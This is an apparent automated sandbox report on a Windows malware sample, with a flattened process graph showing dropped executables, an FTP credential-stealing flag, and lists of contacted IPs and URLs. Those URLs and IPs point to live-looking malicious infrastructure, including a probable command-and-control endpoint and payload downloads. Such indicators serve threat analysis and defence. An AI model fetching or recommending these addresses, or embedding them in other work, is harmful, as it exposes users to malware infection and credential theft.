behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1522474 Sample: file.exe Startdate: 30/09/2024 Architecture: WINDOWS Score: 100 54 GBGTdvHmHHeUVCgjFpXnspnmRmHb.GBGTdvHmHHeUVCgjFpXnspnmRmHb 2->54 62 Suricata IDS alerts for network traffic 2->62 64 Antivirus detection for dropped file 2->64 66 Multi AV Scanner detection for dropped file 2->66 68 6 other signatures 2->68 12 file.exe 22 2->12         started        signatures3 process4 process5 14 cmd.exe 2 12->14         started        file6 52 C:\Users\user\AppData\Local\...\Milfs.pif, PE32 14->52 dropped 80 Uses ping.exe to sleep 14->80 82 Drops PE files with a suspicious file extension 14->82 84 Uses ping.exe to check the status of other devices and networks 14->84 18 Milfs.pif 64 14->18         started        23 cmd.exe 2 14->23         started        25 conhost.exe 14->25         started        27 7 other processes 14->27 signatures7 process8 dnsIp9 56 62.204.41.159, 49737, 80 TNNET-ASTNNetOyMainnetworkFI United Kingdom 18->56 58 176.113.115.187, 49738, 80 SELECTELRU Russian Federation 18->58 44 C:\Users\user\DocumentsFCFBGIDAEH.exe, PE32 18->44 dropped 46 C:\Users\user\AppData\...\softokn3[1].dll, PE32 18->46 dropped 48 C:\Users\user\AppData\Local\...\seed[1].exe, PE32 18->48 dropped 50 11 other files (7 malicious) 18->50 dropped 70 Drops PE files to the document folder of the user 18->70 72 Drops PE files to the user root directory 18->72 74 Tries to harvest and steal ftp login credentials 18->74 76 2 other signatures 18->76 29 cmd.exe 1 18->29         started        file10 signatures11 process12 process13 31 DocumentsFCFBGIDAEH.exe 4 29->31         started        34 conhost.exe 29->34         started        signatures14 86 Antivirus detection for dropped file 31->86 88 Multi AV Scanner detection for dropped file 31->88 90 Machine Learning detection for dropped file 31->90 36 cmd.exe 1 31->36         started        process15 signatures16 78 Uses ping.exe to sleep 36->78 39 PING.EXE 1 36->39         started        42 conhost.exe 36->42         started        process17 dnsIp18 60 2.2.2.2 FranceTelecom-OrangeFR France 39->60
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
2.2.2.2
 unknown France
3215 FranceTelecom-OrangeFR true
62.204.41.159
 unknown United Kingdom
30798 TNNET-ASTNNetOyMainnetworkFI true
176.113.115.187
 unknown Russian Federation
49505 SELECTELRU false

Contacted Domains

Name IP Active
GBGTdvHmHHeUVCgjFpXnspnmRmHb.GBGTdvHmHHeUVCgjFpXnspnmRmHb unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://62.204.41.159/db293a2c1b1c70c4/freebl3.dll true
    		unknown
    http://62.204.41.159/edd20096ecef326d.php true
      		unknown
      http://62.204.41.159/db293a2c1b1c70c4/softokn3.dll true
        		unknown
        http://62.204.41.159/db293a2c1b1c70c4/vcruntime140.dll true
          		unknown
          http://62.204.41.159/ true
            		unknown
            http://62.204.41.159/db293a2c1b1c70c4/msvcp140.dll true
              		unknown
              http://176.113.115.187/seed.exe false
                		unknown
                http://62.204.41.159/db293a2c1b1c70c4/mozglue.dll true
                  		unknown
                  http://62.204.41.159/db293a2c1b1c70c4/nss3.dll true
                    		unknown
                    http://62.204.41.159/db293a2c1b1c70c4/sqlite3.dll true
                      		unknown